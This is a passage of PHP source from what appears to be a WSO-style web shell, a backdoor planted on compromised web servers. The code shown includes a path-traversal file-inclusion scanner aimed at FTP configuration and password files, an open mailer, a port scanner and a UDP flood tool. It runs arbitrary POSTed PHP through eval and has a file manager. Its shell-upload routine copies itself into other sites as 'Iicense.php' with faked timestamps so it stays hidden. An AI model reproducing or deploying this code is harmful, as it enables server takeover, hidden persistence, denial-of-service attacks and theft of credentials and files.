=>"../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",18 =>"../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",19 =>"../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",20 =>"../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",21 =>"../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",22 =>"../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",23 =>"../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",24 =>"../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",25 =>"../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",26 =>"../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",27 =>"../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",28 =>"../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",29 =>"../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",30 =>"../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",31 =>"../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",32 =>"../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",33 =>"../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",34 =>"../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",35 =>"../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",36 =>"../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",37 =>"../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",38 =>"../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",39 =>"../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",40 =>"../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",41 =>"../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",42 =>"../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",43 =>"../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",44 =>"../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");$x=1 ;if($type==1 ){$res1=FetchURL($target.$lfitest);$res2=FetchURL($target.$lfitest2);$rhash1=md5($res1);$rhash2=md5($res2);if($rhash1!=$rhash2){print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";while($lfiaccess[$x]){$res3=FetchURL($target.$lfiaccess[$x]);$rhash3=md5($res3);if($rhash3!=$rhash2){print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br  />";}else {print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br  />";}$x++;}}}if($type==2 ){$res1=FetchURL($target.$lfitest);$res2=FetchURL($target.$lfitest2);$rhash1=md5($res1);$rhash2=md5($res2);if($rhash1!=$rhash2){print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";while($lficonfig[$x]){$res3=FetchURL($target.$lficonfig[$x]);$rhash3=md5($res3);if($rhash3!=$rhash2){print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br  />";}else {print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br  />";}$x++;}}}if($type==3 ){$res1=FetchURL($target.$lfitest);$res2=FetchURL($target.$lfitest2);$rhash1=md5($res1);$rhash2=md5($res2);if($rhash1!=$rhash2){print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";while($lfierror[$x]){$res3=FetchURL($target.$lfierror[$x]);$rhash3=md5($res3);if($rhash3!=$rhash2){print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br  />";}else {print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br  />";}$x++;}}}if($type==4 ){$res1=FetchURL($target.$lfitest);$res2=FetchURL($target.$lfitest2);$rhash1=md5($res1);$rhash2=md5($res2);if($rhash1!=$rhash2){print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";while($lfiphpini[$x]){$res3=FetchURL($target.$lfiphpini[$x]);$rhash3=md5($res3);if($rhash3!=$rhash2){print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br  />";}else {print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br  />";}$x++;}}}if($type==5 ){$res1=FetchURL($target.$lfitest);$res2=FetchURL($target.$lfitest2);$rhash1=md5($res1);$rhash2=md5($res2);if($rhash1!=$rhash2){print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";while($lfimysql[$x]){$res3=FetchURL($target.$lfimysql[$x]);$rhash3=md5($res3);if($rhash3!=$rhash2){print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br  />";}else {print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br  />";}$x++;}}}if($type==6 ){$res1=FetchURL($target.$lfitest);$res2=FetchURL($target.$lfitest2);$rhash1=md5($res1);$rhash2=md5($res2);if($rhash1!=$rhash2){print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";while($lfiftp[$x]){$res3=FetchURL($target.$lfiftp[$x]);$rhash3=md5($res3);if($rhash3!=$rhash2){print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br  />";}else {print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br  />";}$x++;}}}if($type==7 ){$res1=FetchURL($target.$lfitest);$res2=FetchURL($target.$lfitest2);$rhash1=md5($res1);$rhash2=md5($res2);if($rhash1!=$rhash2){print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br  />";{$res3=FetchURL($target.$lfiprocenv);$rhash3=md5($res3);if($rhash3!=$rhash2){print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br  />";}else {print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br  />";}}}}}wsoFooter();}function actionphptools(){wsoHeader(); ?><center><? echo '<b>Mailer</b><br>
<form action="'.$surl.'" method=POST>
<input type="hidden" name="a" value="phptools">
<input type=text name=to value=to><br>
<input type=text name=from value=from><br>
<input type=text name=subject value=subject><br>
<input type=text name=body value=body><br>
<input type=submit name=submit value=Submit></form>';if(isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['body'])){$headers='From: '.$_POST['from'];mail($_POST['to'],$_POST['subject'],$_POST['body'],$headers);echo 'Email sent.';}echo '<br><b>Port Scanner</b><br>';$start=strip_tags($_POST['start']);$end=strip_tags($_POST['end']);$host=strip_tags($_POST['host']);if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){for($i=$start;$i<=$end;$i++){$fp=@fsockopen($host,$i,$errno,$errstr,3 );if($fp){echo 'Port '.$i.' is <font color=green>open</font><br>';}flush();}}else { ?>
<form action="?" method="POST">
<input type="hidden" name="a" value="phptools">
Host:<br />
<input type="text" name="host" value="localhost"/><br />
Port start:<br />
<input type="text" name="start" value="0"/><br />
Port end:<br />
<input type="text" name="end" value="5000"/><br />
<input type="submit" value="Scan Ports" />
</form>
<? }if(isset($_POST['host']) && is_numeric($_POST['time'])){$pakits=0 ;ignore_user_abort(TRUE);set_time_limit(0 );$exec_time=$_POST['time'];$time=time();$max_time=$time+$exec_time;$host=$_POST['host'];for($i=0 ;$i<65000 ;$i++){$out.='X';}while(1 ){$pakits++;if(time()>$max_time){break;}$rand=rand(1 ,65000 );$fp=fsockopen('udp://'.$host,$rand,$errno,$errstr,5 );if($fp){fwrite($fp,$out);fclose($fp);}}echo "<br><b>UDP Flood</b><br>Completed with $pakits (".round(($pakits*65 )/1024 ,2 )." MB) packets averaging ".round($pakits/$exec_time,2 )." packets per second \n";echo '<br><br>
		<form action="'.$surl.'" method=POST>
		<input type="hidden" name="a" value="phptools">
		Host: <input type=text name=host value=localhost>
		Length (seconds): <input type=text name=time value=9999>
		<input type=submit value=Go></form>';}else {echo '<br><b>UDP Flood</b><br>
			<form action=? method=POST>
			<input type="hidden" name="a" value="phptools">
			Host: <br><input type=text name=host value=localhost><br>
			Length (seconds): <br><input type=text name=time value=9999><br>
			<input type=submit value=Go></form>';} ?></center><? wsoFooter();}function actionPhp(){if(isset($_POST['ajax'])){$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=true;ob_start();eval($_POST['p1']);$temp="document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";echo strlen($temp),"\n",$temp;exit;}wsoHeader();if(isset($_POST['p2']) && ($_POST['p2']=='info')){echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';ob_start();phpinfo();$tmp=ob_get_clean();$tmp=preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);$tmp=preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);echo str_replace('<h1','<h2',$tmp).'</div><br>';}if(empty($_POST['ajax']) && !empty($_POST['p1']))$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=false;echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';if(!empty($_POST['p1'])){ob_start();eval($_POST['p1']);echo htmlspecialchars(ob_get_clean());}echo '</pre></div>';wsoFooter();}function actionFilesMan(){wsoHeader();echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';if(!empty($_SESSION['act'])){if($_SESSION['act']=="permis" && isset($_POST['p2'])){$perms=0 ;for($i=strlen($_POST['p2'])-1 ;$i>=0 ;--$i){$perms+=(int)$_POST['p2'][$i]*pow(8 ,(strlen($_POST['p2'])-$i-1 ));}foreach($_SESSION['f'] as $f){@chmod($f,$perms);}unset($_SESSION['f'],$_SESSION['act']);}elseif($_SESSION['act']=='zip' && isset($_POST['p2'])){if(class_exists('ZipArchive')){$zip=new ZipArchive();if($zip->open($_POST['p2'],1 )){chdir($_SESSION['c']);foreach($_SESSION['f'] as $f){if($f=='..')continue;if(@is_file($_SESSION['c'].$f))$zip->addFile($_SESSION['c'].$f,$f);elseif(@is_dir($_SESSION['c'].$f)){$iterator=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));foreach($iterator as $key=>$value){$zip->addFile(realpath($key),$key);}}}chdir($GLOBALS['cwd']);$zip->close();}}unset($_SESSION['f'],$_SESSION['act']);}elseif($_SESSION['act']=='tar' && isset($_POST['p2'])){chdir($_SESSION['c']);$_SESSION['f']=array_map('escapeshellarg',$_SESSION['f']);wsoEx('tar cfzv '.escapeshellarg($_POST['p2']).' '.implode(' ',$_SESSION['f']));chdir($GLOBALS['cwd']);unset($_SESSION['f'],$_SESSION['act']);}}if(!empty($_POST['p1'])){switch($_POST['p1']){case 'uploadFile':{if(!@move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name'])){echo "Can't upload file!";}else {if(is_file('index.php')){$timeOthFile=filemtime('index.php');touch($_FILES['f']['name'],$timeOthFile,$timeOthFile);}}break;}case 'mkdir':if(!@mkdir($_POST['p2']))echo "Can't create new dir";break;case 'delete':function deleteDir($path){$path=(substr($path,-1 )=='/')?$path:$path.'/';$dh=opendir($path);while(($item=readdir($dh))!==false){$item=$path.$item;if((basename($item)=="..") || (basename($item)=="."))continue;$type=filetype($item);if($type=="dir")deleteDir($item);else @unlink($item);}closedir($dh);@rmdir($path);}if(is_array(@$_POST['f']))foreach($_POST['f'] as $f){if($f=='..')continue;$f=urldecode($f);if(is_dir($f))deleteDir($f);else @unlink($f);}break;case 'shellUpload':case 'shellUploadMore10Files':foreach($_POST['f'] as $f){foreach(array('','/public_html','/www','/httpdocs','/docs') as $subdir){$fSub=$f.$subdir;$dirContent=scandir($fSub);if($_POST['p1']=="shellUpload" || ($_POST['p1']=="shellUploadMore10Files" && count($dirContent)>12 )){@copy($_SERVER['SCRIPT_FILENAME'],$fSub.'/Iicense.php');if(@is_file($fSub.'/index.php')){$timeOthFile=@filemtime($fSub.'/index.php');@touch($fSub.'/Iicense.php',$timeOthFile,$timeOthFile);}}}}break;case 'paste':if($_SESSION['act']=='copy'){function copy_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false)if(($f!=".") and ($f!=".."))copy_paste($c.$s.'/',$f,$d.$s.'/');}elseif(is_file($c.$s))@copy($c.$s,$d.$s);}foreach($_SESSION['f'] as $f)copy_paste($_SESSION['c'],$f,$GLOBALS['cwd']);}elseif($_SESSION['act']=='move'){function move_paste($c,$s,$d){if(is_dir($c.$s)){mkdir($d.$s);$h=@opendir($c.$s);while(($f=@readdir($h))!==false)if(($f!=".") and ($f!=".."))copy_paste($c.$s.'/',$f,$d.$s.'/');}elseif(@is_file($c.$s))@copy($c.$s,$d.$s);}foreach($_SESSION['f'] as $f)@rename($_SESSION['c'].$f,$GLOBALS['cwd'].$f);}unset($_SESSION['f']);break;default:if(!empty($_POST['p1'])){$_SESSION['act']=@$_POST['p1'];$_SESSION['f']=@$_POST['f'];foreach($_SESSION['f'] as $k=>$f)$_SESSION['f'][$k]=urldecode($f);$_SESSION['c']=@$_POST['c'];}break;}if(!empty($_SESSION['act'])){if($_SESSION['act']=='unzip'){if(class_exists('ZipArchive')){$zip=new ZipArchive();foreach($_SESSION['f'] as $f){if($zip->open($_SESSION['c'].$f)){$zip->extractTo($GLOBALS['cwd']);$zip->close();}}}unset($_SESSION['f'],$_SESSION['act']);}}}$dirContent=@scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);if($dirContent===false){echo 'Can\'t open this folder!';wsoFooter();return ;}global $sort;$sort=array('name',1 );if(!empty($_POST['p1'])){if(preg_match('!s_([A-z]+)_(\d{1})!',$_POST['p1'],$match))$sort=array($match[1 ],(int)$match[2 ]);}echo "<script>
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == 'checkbox')
				d.files.elements[i].checked = d.files.elements[0].checked;
	}

</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1 ]?0 :1 )."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1 ]?0 :1 )."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1 ]?0 :1 )."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1 ]?0 :1 )."\")'>Permissions</a></th><th>Actions</th></tr>";$dirs=$files=array();$n=count($dirContent);for($i=0 ;$i<$n;$i++){$ow=@posix_getpwuid(@fileowner($dirContent[$i]));$gr=@posix_getgrgid(@filegroup($dirContent[$i]));$tmp=array('name'=>$dirContent[$i],'path'=>$GLOBALS['cwd'].$dirContent[$i],'modify'=>date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),'perms'=>wsoPermsColor($GLOBALS['cwd'].$dirContent[$i]),'size'=>@filesize($GLOBALS['cwd'].$dirContent[$i]),'owner'=>$ow['name']?$ow['name']:@fileowner($dirContent[$i]),'group'=>$gr['name']?$gr['name']:@filegroup($dirContent[$i]),'subfiles'=>(count(@scandir($GLOBALS['cwd'].$dirContent[$i]))-2 ),);if(@is_file($GLOBALS['cwd'].$dirContent[$i]))$files[]=array_merge($tmp,array('type'=>'file'));elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))$dirs[]=array_merge($tmp,array('type'=>'link','link'=>readlink($tmp['path'])));elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i]) && ($dirContent[$i]!="."))$dirs[]=array_merge($tmp,array('type'=>'dir'));}$GLOBALS['sort']=$sort;function wsoCmp($a,$b){if($GLOBALS['sort'][0 ]!='size')return strcmp(strtolower($a[$GLOBALS['sort'][0 ]]),strtolower($b[$GLOBALS['sort'][0 ]]))*($GLOBALS['sort'][1 ]?1 :-1 );else return (($a['size']<$b['size'])?-1 :1 )*($GLOBALS['sort'][1 ]?1 :-1 );}usort($files,"wsoCmp");usort($dirs,"wsoCmp");$files=array_merge($dirs,$files);$l=0 ;foreach($files as $f){if(!isset($f['link'])){$f['link']='';}echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title='.$f['link'].'><b>[ '.htmlspecialchars($f['name']).' ]</b>&nbsp;<span class="small">('.$f['subfiles'].')</span>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'].'</a>'.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')" title="rename">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')" title="touch">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')" title="edit">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')" title="download">D</a>':'').'</td></tr>';$l=$l?0 :1 ;}echo "<tr><td colspan=7>

	<input type=hidden name=a value='FilesMan'>
	<input type=hidden name=c value='".htmlspecialchars($GLOBALS['cwd'])."'>
	<input type=hidden name=charset value='".(isset($_POST['charset'])?$_POST['charset']:'')."'>";echo "<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";if(class_exists('ZipArchive')){echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";}echo "<option value='tar'>Compress (tar.gz)</option>";if(!empty($_SESSION['act']) && @count($_SESSION['f'])){echo "<option value='paste'>Paste / Compress</option>";}echo "<option disabled value=''>----------</option>";echo "<option value='permis'>Permissions</option>";echo "<option value='shellUpload'>Shell upload</option>";echo "<option value='shellUploadMore10Files'>Shell upload (>10 d/f)</option>";echo "</select>&nbsp;";if(!empty($_SESSION['act']) && (($_SESSION['act']=='zip') || ($_SESSION['act']=='tar')) && @count($_SESSION['f'])){echo "file name: <input type=text name=p2 value='wso_".date("Ymd_His").".".($_SESSION['act']=='zip'?'zip':'tar.gz')."'>&nbsp;";}if(!empty($_SESSION['act']) && ($_SESSION['act']=='permis')){echo "<input type=text name=p2 value='0755'>&nbsp;";}echo "<input type='submit' value='>>'>";echo "</td></tr></form></table>";echo "</div>";wsoFooter();}function actionStringTools(){if(!function_exists('hex2bin')){function hex2bin($p){return decbin(hexdec($p));}}if(!function_exists('binhex')){function binhex($p){return dechex(bindec($p));}}if(!function_exists('hex2ascii')){function hex2ascii($p){$r='';for($i=0 ;$i<strLen($p);$i+=2 ){$r.=chr(hexdec($p[$i].$p[$i+1 ]));}return $r;}}if(!function_exists('ascii2hex')){function ascii2hex($p){$r='';for($i=0 ;$i<strlen($p);++$i)$r.=sprintf('%02X',ord($p[$i]));return strtoupper($r);}}if(!function_exists('full_urlencode')){function full_urlencode($p){$r='';for($i=0 ;$i<strlen($p);++$i)$r.='%'.dechex(ord($p[$i]));return strtoupper($r);}}$stringTools=array('Base64 encode'=>'base64_encode','Base64 decode'=>'base64_decode','Url encode'=>'urlencode','Url decode'=>'urldecode','Full urlencode'=>'full_urlencode','md5 hash'=>'md5','sha1 hash'=>'sha1','crypt'=>'crypt','CRC32'=>'crc32','ASCII to HEX'=>'ascii2hex','HEX to ASCII'=>'hex2ascii','HEX to DEC'=>'hexdec','HEX to BIN'=>'hex2bin','DEC to HEX'=>'dechex','DEC to BIN'=>'decbin','BIN to HEX'=>'binhex','BIN to DEC'=>'bindec','String to lower case'=>'strtolower','String to upper case'=>'strtoupper','Htmlspecialchars'=>'htmlspecialchars','String length'=>'strlen',);if(isset($_POST['ajax'])){$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=true;ob_start();if(in_array($_POST['p1'],$stringTools))echo $_POST['p1']($_POST['p2']);$temp="document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";echo strlen($temp),"\n",$temp;exit;}wsoHeader();echo '<h1>String conversions</h1><div class=content>';if(empty($_POST['ajax']) && !empty($_POST['p1']))$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']=false;echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";foreach($stringTools as $k=>$v)echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";if(!empty($_POST['p1'])){if(in_array($_POST['p1'],$stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));}echo "</pre></div><br><h1>Search text in files:</h1><div class=content>

		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
			<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
			<tr><td>Path:</td><td><input type='text' name='cwd' value='".htmlspecialchars($GLOBALS['cwd'])."' style='width:100%'></td></tr>
			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
			<tr><td></td><td><input type='submit' value='>>'></td></tr>
			</table></form>";function wsoRecursiveGlob($path){if(substr($path,-1 )!='/')$path.='/';$paths=@array_unique(@array_merge(@glob($path.$_POST['p3']),@glob($path.'*',GLOB_ONLYDIR)));if(is_array($paths) && @count($paths)){foreach($paths as $item){if(@is_dir($item)){if($path!=$item)wsoRecursiveGlob($item);}else {if(@strpos(@file_get_contents($item),@$_POST['p2'])!==false)echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";}}}}if(@$_POST['p3'])wsoRecursiveGlob($_POST['c']);echo "</div><br><h1>Search for hash:</h1><div class=content>

		<form method='post' target='_blank' name='hf'>
			<input type='text' name='hash' style='width:200px;'><br>
			<input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
			<input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
			<input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
			<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
			<input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
		</form></div>";wsoFooter();}function actionFilesTools(){if(isset($_POST['p1']))$_POST['p1']=urldecode($_POST['p1']);if(@$_POST['p2']=='download'){if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])){ob_start("ob_gzhandler",4096 );header("Content-Disposition: attachment; filename=".basename($_POST['p1']));if(function_exists("mime_content_type")){$type=@mime_content_type($_POST['p1']);header("Content-Type: ".$type);}else header("Content-Type: application/octet-stream");$fp=@fopen($_POST['p1'],"r");if($fp){while(!@feof($fp))echo @fread($fp,1024 );fclose($fp);}}exit;}if(@$_POST['p2']=='mkfile'){if(!file_exists($_POST['p1'])){$fp=@fopen($_POST['p1'],'w');if($fp){$_POST['p2']="edit";fclose($fp);}}}wsoHeader();echo '<h1>File tools</h1><div class=content>';if(!file_exists(@$_POST['p1'])){echo 'File not exists';wsoFooter();return ;}$uid=@posix_getpwuid(@fileowner($_POST['p1']));if(!$uid){$uid['name']=@fileowner($_POST['p1']);$gid['name']=@filegroup($_POST['p1']);}else $gid=@posix_getgrgid(@filegroup($_POST['p1']));echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';if(empty($_POST['p2']))$_POST['p2']='view';if(is_file($_POST['p1']))$m=array('View','Highlight','Download','Hexdump','Edit','Chmod','Rename','Touch');else $m=array('Chmod','Rename','Touch');foreach($m as $v)echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';echo '<br><br>';switch($_POST['p2']){case 'view':echo '<pre class=ml1>';$fp=@fopen($_POST['p1'],'r');if($fp){while(!@feof($fp))echo htmlspecialchars(@fread($fp,1024 ));@fclose($fp);}echo '</pre>';break;case 'highlight':if(@is_readable($_POST['p1'])){echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';$code=@highlight_file($_POST['p1'],true);echo str_replace(array('<span ','</span>'),array('<font ','</font>'),$code).'</div>';}break;case 'chmod':if(!empty($_POST['p3'])){$perms=0 ;for($i=strlen($_POST['p3'])-1 ;$i>=0 ;--$i)$perms+=(int)$_POST['p3'][$i]*pow(8 ,(strlen($_POST['p3'])-$i-1 ));if(!@chmod($_POST['p1'],$perms))echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';}clearstatcache();echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o',fileperms($_POST['p1'])),-4 ).'"><input type=submit value=">>"></form>';break;case 'edit':if(!is_writable($_POST['p1'])){echo 'File isn\'t writeable';break;}if(!empty($_POST['p3'])){$time=@filemtime($_POST['p1']);$_POST['p3']=substr($_POST['p3'],1 );$fp=@fopen($_POST['p1'],"w");if($fp){@fwrite($fp,$_POST['p3']);@fclose($fp);echo 'Saved!<br><script>p3_="";</script>';@touch($_POST['p1'],$time,$time);}}echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';$fp=@fopen($_POST['p1'],'r');if($fp){while(!@feof($fp))echo htmlspecialchars(@fread($fp,1024 ));@fclose($fp);}echo '</textarea><input type=submit value=">>"></form>';break;case 'hexdump':$c=@file_get_contents($_POST['p1']);$n=0 ;$h=array('00000000<br>','','');$len=strlen($c);for($i=0 ;$i<$len;++$i){$h[1 ].=sprintf('%02X',ord($c[$i])).' ';switch(ord($c[$i])){case 0 :$h[2 ].=' ';break;case 9 :$h[2 ].=' ';break;case 10 :$h[2 ].=' ';break;case 13 :$h[2 ].=' ';break;default:$h[2 ].=$c[$i];break;}$n++;if($n==32 ){$n=0 ;if($i+1 <$len){$h[0 ].=sprintf('%08X',$i+1 ).'<br>';}$h[1 ].='<br>';$h[2 ].="\n";}}echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0 ].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1 ].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2 ]).'</pre></td></tr></table>';break;case 'rename':if(!empty($_POST['p3'])){if(!@rename($_POST['p1'],$_POST['p3']))echo 'Can\'t rename!<br>';else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');}echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input 